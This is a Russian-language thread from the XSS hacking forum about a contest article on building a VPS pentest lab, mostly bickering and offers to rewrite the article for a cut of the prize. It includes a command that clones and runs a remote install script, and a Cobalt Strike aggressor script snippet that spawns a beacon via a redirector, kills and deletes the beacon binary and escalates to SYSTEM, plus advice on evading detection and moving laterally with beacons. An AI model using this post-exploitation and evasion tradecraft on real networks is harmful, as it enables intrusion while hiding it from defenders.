• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Не ждали? XD Как превратить VPS в лабораторию пентеста с интерфейсом и безопасной работой внутри.

Забавно: когда об этом говорит админ или модератор, то это справедливо, когда об этом говорю я, то:
ну прости (я даже пароль 2 раза набирала, чтобы извиниться), жадным пацан оказался - таки хочет выиграть и забрать главный приз.
оформит сам, или Eject поможет (за %).

еще и админа поминает почтительно - неспроста
 
Пожалуйста, обратите внимание, что пользователь заблокирован
ну прости (я даже пароль 2 раза набирала, чтобы извиниться)
Да никаких проблем. Вы с ним как то бурно отреагировали, я даже перечитал, может я что не так написал, но вроде норм было. А потом сам сагрился на его сообщение, о том, что я спиздил свою статью из каких-то его мемуаров, и срач развелся как-то сам собой. Так что тоже, извините, если кого обидел и/или докопался зазря.
 
re:
Вы с ним как то бурно отреагировали
Мы - холерики. Этим все сказано.
спиздил свою статью из каких-то его мемуаров
не обращайте внимания. Это несерьезно (знали бы что я в свой адрес услышала).
 
Я вам намекну, тут есть классный писатель/переводчик yashechka, который бы отлично справился с этим.
Согласен с классным писателем\переводчиком. Золотой человечище!
Договориться за процент от призовых как вариант, но лучше конечно чтобы сам ТС это сделал т.к никто лучше не расскажет о скрипте, чем сам создатель хоть и бывают исключения
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Да никаких проблем. Вы с ним как то бурно отреагировали, я даже перечитал, может я что не так написал, но вроде норм было. А потом сам сагрился на его сообщение, о том, что я спиздил свою статью из каких-то его мемуаров, и срач развелся как-то сам собой. Так что тоже, извините, если кого обидел и/или докопался зазря.
Ох, на такие извращения сюжета, способна, мне кажется, лишь уменица старших классов. Про мои не говорил никто. Сказал лишь, что я писал о подобном) в принципе изначально даже безадресно было, ты как то сам на себя тут потянул) Отсюда и вывод, если с полом перепутал - прости, я не нарочно
 
Я немного прочитал и думал зрения потеряю, да еще и двигать нужно нижним слайдером, гайд хороший но бл, визуалка просто вырви глаз.
Я могу сделать нормальную статью, что бы нормально было со скринами и т.д.
Описать пошагово все, если ты меня в долю возьмешь ахахахха
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Я немного прочитал и думал зрения потеряю, да еще и двигать нужно нижним слайдером, гайд хороший но бл, визуалка просто вырви глаз.
Я могу сделать нормальную статью, что бы нормально было со скринами и т.д.
Описать пошагово все, если ты меня в долю возьмешь ахахахха
а что ее делать...название супер ос...далее копируй текст со скрипта...скрины...хз..помощь в чем..доля....)))) я тоже от левых бабок не откажусь....думаю тс зря это выложил .......но это его право....
 
Пожалуйста, обратите внимание, что пользователь заблокирован
в долю всех берут в ньюммм вроде. чекните
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Так вот именно что никто никого не обсирает, просто есть люди которых задевает что кто то сделал комментарий по поводу того или иного продукта, надо уметь прислушиваться к любой критики или комментариям.
А в целом я соглашусь, лучше сидеть себе молча и делать дела, и нервы целей и настроение лучше )
Бро..жду в Лс..
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Всем привеет =) Так как ко мне в личку не постучался никто по поводу бета, вынужден в очередной раз пойти на крайность, а именно: сделать репо паблик, бефор релиз. Самых совестливых (на этот раз серьезно) прошу сделать то же самое, а именно - укахать недостатки, ошибки, предложить что-то свое, сравнить с изначальной версией :) хорошего настроения =(
git clone https://github.com/l4ckyguy/ukn0w /opt/xss ; cd /opt/xss ; ./install.sh
на этот раз скрипт исполняется не с хоста, а с локалхост. подобие терраформ и ансибл))) как всегда мое личная спизженная полу-паблик имплементация =)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
ясно приольно. а джамп куда бикон закидывет? тогда уж рефлективную библиотеку. и каждый процесс ручками вводить)))
(ЗЫ: я как делаю-то:

cat<<'EOF'>/path/to/any.cna
alias helloprivet {
bspawn($1, "redirectror"); #<=это хендлер
bpowerpick("stop-process -name beacon.exe");
bshell ($1, "rm /path/to/beacon.exe");
bgetsystem ($1);
}
EOF

подгружаем скриптец, и в консоле бикона пишем: приветомлет
все! фокус закрывается. ну это просто грубый пример. весь смысл в том, чтобы юзер включал голову, а не ебошил шаблоны. где шаблоны - там ошибки, детекты и прочие радости обываетля троллейбуса. не будь кондуктором, не пиши чушь плиз))
 
Пожалуйста, обратите внимание, что пользователь заблокирован
все бы хорошо, мне как кажется очень палевная тема с маяками, то есть abuser получается кидает маяк на каждую машинку где получил доступ, beacon.exe "\\tmp" думаю стоило бы рассмотреть вариант с передвижением другой метод менее палевный, либо сделать самоудаление маяка, только проблема что сессия слетит если удалить маяк после загрузки! Получается после как скрипт закончит работу, сеть будет засрана маяками по всюду, предлагаю прассмотреть вариант с jump по сети
а где все бы хорошо, лучше бы по-подробнее. где хорошо, а где бы. сделал же репо открытым))) ну оке)) аттрацион клоуз. вилл опен афтерйестердай эт ту о-клок
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх